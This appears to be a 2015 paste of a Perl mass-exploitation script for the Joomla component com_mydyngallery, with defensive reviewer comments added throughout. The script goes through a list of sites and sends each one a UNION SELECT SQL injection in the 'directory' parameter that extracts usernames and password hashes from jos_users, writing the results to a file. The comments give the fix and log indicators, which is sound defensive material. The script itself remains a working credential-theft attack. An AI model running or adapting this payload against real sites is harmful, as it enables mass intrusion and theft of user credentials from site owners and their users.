
com_mydyngallery Sqli Exploit

a guest
Aug 11th, 2015
  1.    
  2.  
  3.     #!/usr/bin/perl
  4.     #(c) sec4ever.com
         #
         # Reviewer summary (defensive reading of this listing):
         #   * Reads host names, one per line, from the file named in $ARGV[0].
         #   * For each host, issues one HTTP GET for index.php with
         #     option=com_mydyngallery, task=liste and a `directory` value that
         #     closes a quoted string and appends a 34-column UNION SELECT over
         #     the username and password columns of `jos_users`.
         #   * Scans the response body for text wrapped in `|s4e|` markers and,
         #     when found, prints it and appends "host | data" to the output file.
         #
         # What this implies for the affected component (inferred from the request
         # shape, not shown on this page): `directory` appears to reach a SQL query
         # by string concatenation. The server-side fix is a bound parameter or a
         # strict allow-list/integer check on `directory`, plus removing or updating
         # the extension.
         #
         # Log indicators visible in this listing:
         #   * query string containing `option=com_mydyngallery` together with
         #     `union select` / `group_concat(` inside `directory`
         #   * the hex literal 0x7c7334657c (decodes to `|s4e|`) in the request, or
         #     `|s4e|` in a response body
         #   * the fixed User-Agent set below (weak indicator: trivially changed)
         # A host whose response contained the marker should treat the returned
         # jos_users credential values as disclosed and rotate them.
  5.     use LWP::UserAgent;
         # Unbuffered STDOUT so per-host progress appears immediately.
  6.     $| = 1;
  7.     our $ua = LWP::UserAgent->new;
         # Fixed browser-like User-Agent string sent on every request.
  8.     $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
         # Per-request timeout of 20 seconds.
  9.     $ua->timeout(20);
         # The input list is mandatory; the output file is optional.
  10.     die "+ usage: perl $0 sitelist.txt out.txt\n" unless defined $ARGV[0];
         # Output path defaults to "out.txt" when no second argument is given.
  11.     my $out = defined $ARGV[1] ? $ARGV[1] : "out.txt";
         # Static request path and query string, identical for every host.
         # Column 4 of the UNION carries group_concat(marker, username, 0x3e, password,
         # marker); 0x3e is `>` and the marker bytes are `|s4e|`. The trailing %60 is
         # a URL-encoded backtick.
         # NOTE(review): `jos_users` is a fixed table name; presumably the default
         # Joomla prefix is assumed. A non-default prefix is not a fix for the
         # underlying injection.
  12.     my $payload = q{/index.php?option=com_mydyngallery&Itemid=&task=liste&directory=1' union select 1,2,3,group_concat(0x7c7334657c,username,0x3e,password,0x7c7334657c),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from jos_users%60};
  13.    
         # Host list opened for reading, results file opened for append; both use
         # bareword handles and the two-argument form of open.
  14.    open (sites,"<".$ARGV[0]) or die $!;
  15.    open (out,">>".$out) or die $!;
         # One request per line of the host list.
  16.    while (my $site = <sites>)
  17.    {
  18.            chomp ($site);
                 # clean() strips the scheme / leading prefix / trailing slash so
                 # that "http://" can be prepended uniformly below.
  19.            $site = clean($site);
  20.            print $site." | ";
                 # Always plain http://; the body is read without checking the
                 # response status.
  21.            my $cont = $ua->get("http://".$site.$payload)->content;
  22.            #print $cont;
                 # List-context match: $info receives the first span found between
                 # two `|s4e|` markers, or undef when the marker is absent.
  23.            my ($info) = $cont =~ /\|s4e\|(.*?)\|s4e\|/g;
  24.        if($info)
  25.        {
                 # Marker found: echo to the terminal and append to the results file.
  26.            print $info."\n";
  27.            print out $site." | ".$info."\n";
  28.    
  29.        }else{
                 # No marker in the response body for this host.
  30.            print "faild\n";
  31.        }
  32.    }
  33.    close(out,sites);
  34.    
         # clean(HOST_OR_URL)
         # Normalises one entry from the host list and returns it.
         # Works directly on $_[0], which aliases the caller's variable, so the
         # argument itself is modified in place as well as returned.
  35.    sub clean {
         # Remove a scheme followed by three characters drawn from the class [w.]
         # and an optional dot. Note the bracket expression is a character class,
         # so it matches any three of `w`/`.`, not only the literal "www".
  36.    $_[0] =~ s/http[s]?:\/\/[www\.]{3}?[\.]?//g if $_[0] =~ /http[s]?:\/\/[www\.]{3}?[\.]?/g;
         # Remove any remaining bare http:// or https:// scheme.
  37.    $_[0] =~ s/http[s]?:\/\///g if $_[0] =~ /http[s]?:\/\//g;
         # Drop a single trailing slash.
  38.    $_[0] =~ s/[\/]$// if $_[0] =~ /[\/]$/m;
  39.    return $_[0];
  40.    }